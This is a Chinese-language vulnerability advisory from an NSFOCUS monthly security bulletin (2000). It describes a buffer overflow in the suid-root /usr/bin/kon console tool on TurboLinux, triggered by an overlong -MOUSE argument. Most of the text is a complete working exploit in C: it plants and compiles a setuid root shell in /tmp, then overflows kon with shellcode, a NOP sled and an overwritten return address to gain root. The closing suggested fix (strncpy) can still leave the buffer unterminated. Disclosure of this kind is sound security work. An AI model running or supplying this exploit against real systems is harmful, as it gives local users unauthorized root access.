首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第9期->最新漏洞
期刊号: 类型: 关键词:
Linux /usr/bin/kon缓冲区溢出漏洞

作者:UNYUN (shadowpenguin@backsection.net)
日期:2000-05-05


发布日期: 2000-5-11
更新日期: 2000-5-11

受影响的系统:  
TurboLinux1.0 / kon2-0.3.7-3.i386.rpm
TurboLinux2.0 / kon2-0.3.8-10TL.i386.rpm
TurboLinux3.0 / kon2-0.3.8-11TL.i386.rpm
TurboLinux4.2 / kon2-0.3.8-13.i386.rpm
TurboLinux4.2 / kon2-0.3.8-13.i386.rpm


--------------------------------------------------------------------------------
描述:

/usr/bin/kon是一个控制台显示工具。它被设置了suid root位。当给它的-MOUSE传递
一个很长的字符串时,将导致它发生缓冲区溢出。本地用户可以获得root权限。


问题出在 -MOUSE接收参数的处理代码部分,src/mouse.c中的ConfigMouse()函数中:

<....>
static int  ConfigMouse(const char *config)
{
    struct mouseconf *p;
    char name[MAX_COLS]; <--- 固定大小的缓冲区

    mouseType = MOUSE_NONE;
    mInfo.has_mouse = FALSE;
    sscanf(config, "%s", name);
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     这里将导致溢出发生

            DefineCap("MouseDev", ConfigMouseDev, "/dev/mouse");
            return SUCCESS;
        }
    }
    warn("unknown mouse type `%s' ignored; assuming no mouse\r\n", name);
    return SUCCESS;
}
<....>

<* 来源: UNYUN
         http://shadowpenguin.backsection.net
*>         


-------------------------------------------------------------------------------
测试程序:


/*We (ShadowPenguinSecurity) found the security vulnerability in
/usr/bin/kon which are installed
on Turbo Linux series by default. This is a suid program, it overflows if
the long argment
is specified with -MOUSE option. I (Unyun) coded an exploit for the Linux,
the local user can
obtain a root privilege
*/

/*==========================================================================
===
   Linux kon/kon2 Exploit for Linux
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by  UNYUN  (shadowpenguin@backsection.net)

============================================================================
=
*/
#include <stdlib.h>
#include <stdio.h>

#define KON_PATH "/usr/bin/kon"
#define RET_ADR  260
#define JMP_OFS  0x2474
#define CODE_OFS 320
#define MAXBUF   8000
#define NOP      0x90
#define SHELL    "/tmp/pp"
#define COMPILER "gcc"

char exec[80]=
  "\xeb\x31\x5e\x89\x76\x08\x31\xc0\x31\xd2\xb2\x04\x88\x46\x07\x01"
  "\xd6\x89\x46\x08\x29\xd6\xb0\x08\xfe\xc0\xfe\xc0\xfe\xc0\x89\xf3"
  "\x8d\x4e\x08\x01\xd6\x8d\x56\x08\x29\xd6\xcd\x80\x31\xdb\x89\xd8"
  "\x40\xcd\x80\xe8\xca\xff\xff\xff";  // for kon/kon2 exploit

char            xx[MAXBUF+1];
unsigned int    i,ip,sp;
FILE            *fp;

unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}

main(int argc,char *argv[])
{

    strcat(exec,SHELL);
    sprintf(xx,"%s.c",SHELL);
    if ((fp=fopen(xx,"w"))==NULL){
        printf("Can not write to %s\n",xx);
        exit(1);
    }
    fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
    fclose(fp);
    sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
    system(xx);

    sp=get_sp();
    printf("ESP = %x\n",sp);
    memset(xx,NOP,MAXBUF);

    ip=sp-JMP_OFS;
    xx[RET_ADR  ]=ip&0xff;
    xx[RET_ADR+1]=(ip>>8)&0xff;
    xx[RET_ADR+2]=(ip>>16)&0xff;
    xx[RET_ADR+3]=(ip>>24)&0xff;

    strncpy(xx+CODE_OFS,exec,strlen(exec));
    xx[MAXBUF-1]=0;
    execl(KON_PATH,"kon","-MOUSE",xx,(char *) 0);
}


--------------------------------------------------------------------------------
建议:
临时解决方法:
将 sscanf(config, "%s", name);
用下列语句替换:

strncpy(name,config,MAX_COLS);

重新编译kon程序。



版权所有,未经许可,不得转载